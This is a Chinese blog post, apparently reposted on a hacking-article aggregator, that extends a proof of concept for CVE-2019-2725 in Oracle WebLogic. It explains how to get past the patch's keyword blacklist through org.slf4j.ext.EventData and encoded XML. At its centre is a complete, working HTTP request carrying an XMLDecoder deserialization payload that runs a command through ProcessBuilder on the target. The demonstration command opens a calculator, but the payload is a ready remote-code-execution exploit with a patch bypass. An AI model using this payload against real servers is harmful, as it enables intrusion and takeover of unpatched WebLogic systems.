记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CVE-2019-2725高版本POC拓展

2021-01-19 20:49

 

前言

在对大佬们高版本的POC进行分析后,我把重点放在了如何绕过黑名单限制上,那么利用XML可以解析的其它编码格式尝试一下绕过。

 

补丁回顾

首先回顾一下这个经典的补丁截图,摘自:

http://www.sd.edu.cn/info/1011/1131.htm

可以看到对object、new、method关键字做了限制,而且对于array数组的长度也做了限制,不得大于10000。

 

高版本POC分析

现在网上也公开了12.1.3版本的POC,利用org.slf4j.ext.EventData类进行反序列化操作,这个类的构造方法如下:

可以看到这个类需要接收一个XML的字符串,那么POC构造如下:

那前面也看到了补丁限制了一些关键字,而需要解析的XML恰好含有这些关键字,绕过的思路就是整个的XML字段真的当作一个字符串传入,CDATA包含的字符串正好可以作为XML文本去解析。

 

绕过思路扩展

说到这里大家可能就明白了,只要是XML能够解析的编码格式都可以一试,此时想起了前不久看到的《WAF Bypass之xerces解析》,这篇文章对XML的解析格式进行了分析,其中一种简便快捷的方式就是HTML实体编码,欸,讨巧了,直接尝试将org.slf4j.ext.EventData类的构造参数用实体编码传入试一下:

很快啊,计算器啪地一下就弹出来了

POC如下:

POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.188.130:7001Accept-Encoding: gzip, deflateSOAPAction:Accept: /User-Agent: Apache-HttpClient/4.1.1 (java 1.5)Connection: keep-alivecontent-type: text/xmlContent-Length: 1946
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>org.slf4j.ext.EventData</string><void><string><java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java></string></void></class></java></work:WorkContext></soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

 

总结

应该还有其它的编码绕过,希望有时间去搞吧。

 

参考链接

https://blog.csdn.net/weixin_30408739/article/details/99877655
https://xz.aliyun.com/t/7116
https://www.anquanke.com/post/id/209826
http://www.sd.edu.cn/info/1011/1131.htm

(点击“阅读原文”查看链接)


- End -
精彩推荐
Apache Flink CVE-2020-17518/17519 漏洞分析
关公面前耍大刀?利用色情反向链接威胁网站运营商
SolarLeaks网站声称将出售SolarWinds攻击中的被盗数据
Google CTF justintime




戳“阅读原文”查看更多内容

知识来源: https://mp.weixin.qq.com/s?__biz=MzA5ODA0NDE2MA==&mid=2649738501&idx=1&sn=c968d800ad122d4ba95acc7b85d08ed3

阅读:155939 | 评论:0 | 标签:CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2019-2725高版本POC拓展”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁